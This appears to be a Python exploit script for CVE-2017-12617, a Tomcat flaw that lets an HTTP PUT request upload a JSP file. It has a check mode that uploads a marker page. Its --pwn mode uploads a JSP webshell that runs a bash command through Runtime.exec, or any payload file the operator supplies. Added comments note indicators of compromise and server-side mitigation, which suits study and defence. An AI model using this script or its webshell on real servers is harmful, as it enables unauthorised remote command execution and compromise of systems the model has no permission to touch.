Created
December 10, 2019 02:46
import requests | |
import os | |
from argparse import ArgumentParser, FileType | |
# Text printed once at start-up: the CVE this script tests for and the author tag.
banner = """
CVE-2017-12617
Frank
""".lstrip("\n")

# Harmless marker page used by the check mode. It only prints the word
# "content", so fetching it back shows whether an uploaded JSP is stored
# (and executed) by the server without running any OS command.
pin = '<% out.println("content");%>'

# Default page uploaded by the --pwn mode. Unlike `pin`, this JSP starts an OS
# process on the server (a fixed `whoami` through bash) and echoes its output
# inside a <pre> element, i.e. it demonstrates command execution as the
# account running the servlet container.
# Defender note: a JSP file that calls Runtime.exec() appearing in a web
# application's root, or an unexpected upload.jsp there, should be treated as
# an indicator of compromise and not only as a test artifact.
payload = """
<%@ page import="java.io.*" %>
<%
String output = "";
String s = null;
try {
Process p = Runtime.getRuntime().exec(new String[]{
"bash", "-c", "whoami"
});
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"\\n"; }
} catch(IOException e) { e.printStackTrace(); }
%>
<pre><%=output %></pre>"""
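def upload_payload(url, payload):
    """PUT *payload* to *url* and report whether the server created it.

    The URL is normalised to end in exactly one "/" before the request is
    sent, so the request path seen by the server ends in ".jsp/" when the
    caller passes ".../upload.jsp/". Access-log entries for PUT requests
    with such a path and a 201 response are the trace this function leaves.

    Args:
        url: Destination URL of the PUT request.
        payload: Text body to upload; sent UTF-8 encoded.

    Returns:
        True only when the server answers 201 (Created). Any other status,
        and any transport failure, yields False. A server that overwrites an
        existing resource usually answers with a different success code, so
        a second run against the same path is presumably reported as False
        (NOTE(review): confirm against the server under test).
    """
    url = url.rstrip('/') + '/'
    try:
        # A timeout keeps the script from hanging forever on a host that
        # accepts the connection but never answers; 10 s is an arbitrary
        # but generous bound for a single small upload.
        response = requests.put(
            url, data=payload.encode('utf-8'), timeout=10
        )
    except requests.exceptions.RequestException:
        # Only network/HTTP-layer failures are reported as "unreachable";
        # the former bare `except:` also hid KeyboardInterrupt and
        # programming errors behind the same message.
        print('unable to reach target: ', url)
        return False
    return response.status_code == 201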
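if __name__ == '__main__':
    # Command line: -u is mandatory, -p switches from the check to the
    # command-executing upload, -f replaces the built-in page used by -p.
    parse = ArgumentParser()
    parse.add_argument("-u", "--url", dest="target", type=str,
                       help="set target url", required=True)
    parse.add_argument("-p", "--pwn", dest="pwn", action='store_true',
                       help="generate webshell and upload it")
    parse.add_argument("-f", "--file", dest="file", type=FileType('r'))
    opt = parse.parse_args()

    # `store_true` makes opt.pwn False (never None) when -p is absent. The
    # former `opt.pwn == None` tests were therefore never true, the check
    # branch was unreachable, and every run uploaded the command-executing
    # page. Test the flag's truth value so the default run is check-only.
    if opt.file is not None and not opt.pwn:
        parse.error('-f/--file is only used together with -p/--pwn')

    # --url is required, so opt.target is always set at this point.
    # Trailing slashes are stripped (the former lstrip removed leading ones)
    # so the base URL and the fixed file name join with a single "/".
    target = opt.target.rstrip('/') + '/upload.jsp/'
    print(banner)

    if not opt.pwn:
        # Check mode: upload the harmless marker page and fetch it back.
        # Caveats when reading the result:
        #  * the marker file stays on the server afterwards and has to be
        #    removed from the web application root by hand;
        #  * the match is a plain substring test for "content", which the
        #    unexecuted JSP source and many unrelated pages also contain;
        #  * "Not Vulnerable" only means this one request did not succeed
        #    (for example the file already existed, or a proxy filtered
        #    PUT). It does not prove the server is patched.
        # Mitigation is on the server side: keep the default servlet's
        # `readonly` init-param at true and run a fixed Tomcat release.
        try:
            vulnerable = upload_payload(target, pin) \
                and 'content' in requests.get(target, timeout=10).text
        except requests.exceptions.RequestException:
            print('unable to reach target: ', target)
            vulnerable = False
        if vulnerable:
            print('Target is Vulnerable to CVE-2017-12617')
        else:
            print('Not Vulnerable to CVE-2017-12617 ')
    else:
        if opt.file is not None:
            # A file that cannot be read aborts the run. The former
            # `except: pass` silently fell back to the built-in page, i.e.
            # uploaded something other than what the operator selected.
            try:
                with opt.file:
                    payload = opt.file.read()
            except (OSError, UnicodeDecodeError) as exc:
                parse.error('cannot read payload file {}: {}'.format(
                    opt.file.name, exc))
            print('Using', opt.file.name, 'as payload')
        print("Uploading File .....")
        upload_payload(target, payload)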